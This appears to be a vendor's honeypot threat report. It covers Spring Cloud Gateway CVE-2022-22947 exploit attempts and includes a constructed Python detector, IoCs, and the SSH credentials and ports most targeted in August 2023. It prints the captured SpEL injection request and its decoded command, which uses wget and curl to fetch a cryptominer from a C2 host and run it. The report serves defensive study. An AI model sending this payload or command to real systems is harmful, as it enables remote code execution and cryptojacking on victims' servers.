TEHTRIS believes in building cyber threat intelligence on empirical observations of what is happening in the cyber world. To do so, we deployed a large network of honeypots equipped with TEHTRIS solutions, and our team analyses the logs collected in the XDR Platform.
Keeping track of trends, and keeping an eye on what threat actors actively scan during their reconnaissance phase, allows us to adjust our cybersecurity posture and to detect weak signals of further malicious activity.
Check out our previous report here.
CVE-2022-22947 EXPLOIT ATTEMPTS
We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypot network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.
On the 26th and 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and flagged as malicious in public databases, targeted our honeypots on port TCP/80. The devices affected are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.
Here is an example of the corresponding request captured by our honeypot:
POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient

{ "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }
This request exploits CVE-2022-22947: the SpEL expression placed in the filter argument is evaluated by the gateway, which executes a base64-encoded command on the victim.
The decoded command downloads an XMRig cryptocurrency miner and executes it:
pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm
The Dutch C2 (command and control) IP address 185.225.75[.]242 is hosted by AS211252 (Delis LLC) and is known to the VirusTotal community, where it is reported for SSH credential attacks and linked to a miner.
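As an added example (not code from the TEHTRIS report), here is a detection a defender could run over captured gateway requests: it flags POSTs to the actuator route endpoint whose filter arguments carry a SpEL expression, records which Java types the expression reaches for, and decodes any base64 blob so the analyst sees the command the payload would have run. The sample requests, route ids and hostnames are constructed.

```python
import base64, json, re
# Detection for CVE-2022-22947-style route definitions: a POST to the gateway
# actuator that embeds a SpEL expression ("#{...}") in a filter argument.
ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/[^/?#]+$")
SPEL = re.compile(r"#\{.*\}", re.S)
B64_ARG = re.compile(r'decode\("([A-Za-z0-9+/=]{4,})"\)')
RISKY_TYPES = ("java.lang.Runtime", "java.lang.ProcessBuilder")

def inspect_request(method, path, body):
    """Return a finding for a route definition carrying SpEL, or None."""
    if method != "POST" or not ROUTE_PATH.match(path):
        return None
    try:
        route = json.loads(body)
    except ValueError:
        return None  # not a JSON route body, nothing the gateway would evaluate
    if not isinstance(route, dict):
        return None
    hits = []
    for flt in route.get("filters", []):
        for arg, value in flt.get("args", {}).items():
            if not isinstance(value, str) or not SPEL.search(value):
                continue  # plain literal, not evaluated as an expression
            decoded = []
            for blob in B64_ARG.findall(value):
                try:  # surface what the payload would run, for analyst review
                    decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
                except ValueError:
                    pass  # leave undecodable blobs as-is
            hits.append({"filter": flt.get("name"), "arg": arg, "decoded": decoded,
                         "risky_types": [t for t in RISKY_TYPES if f"T({t})" in value]})
    return {"route_id": route.get("id"), "filters": hits} if hits else None

def scan(requests):
    """Apply inspect_request to (method, path, body) tuples; return the findings."""
    return [f for f in (inspect_request(*r) for r in requests) if f]

# Constructed sample traffic (not the honeypot capture): a benign route, a route
# whose header value wraps a base64-encoded command in SpEL, and an unrelated GET.
def _route(route_id, header_value, uri):
    return json.dumps({"id": route_id, "uri": uri, "filters": [
        {"name": "AddResponseHeader", "args": {"name": "Result", "value": header_value}}]})
CONSTRUCTED_CMD = base64.b64encode(b"uname -a").decode()
SPEL_VALUE = ('#{T(java.lang.Runtime).getRuntime().exec(new String('
              'java.util.Base64.getDecoder().decode("%s")))}' % CONSTRUCTED_CMD)
SAMPLE_REQUESTS = [
    ("POST", "/actuator/gateway/routes/benign-1", _route("benign-1", "prod", "http://backend.internal")),
    ("POST", "/actuator/gateway/routes/sus-1", _route("sus-1", SPEL_VALUE, "http://example.com")),
    ("GET", "/actuator/health", ""),
]
```

Running `scan(SAMPLE_REQUESTS)` yields a single finding for route `sus-1` with the decoded command `uname -a`; the benign route and the health check produce nothing.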
IoCs
- 185.207.250[.]115
- 185.225.75[.]242
SSH services targeted – August trends
For the month of August 2023, we observed the following trends in malicious activity targeting SSH services on our worldwide honeypot network.
Top 10 credentials tested by threat actors:
Login | Password
--- | ---
345gs5662d34 | 345gs5662d34
admin | admin
0 | 0
ubnt | ubnt
root | password
root | root
admin | admin123
factory | factory
3comcso | RIP000
cameras | cameras
Top 10 of the most malicious IP addresses (all known from public databases).
Top ports/protocols targeted by threat actors – August 2023
Protocol | Port | Share of traffic
--- | --- | ---
TCP | 445 | 18.833%
TCP | 22 | 12.43%
TCP | 80 | 6.273%
TCP | 23 | 5.598%
TCP | 6379 | 1.546%
TCP | 443 | 1.22%
UDP | 12522 | 1.166%
TCP | 3389 | 0.964%
UDP | 5060 | 0.641%
TCP | 8443 | 0.508%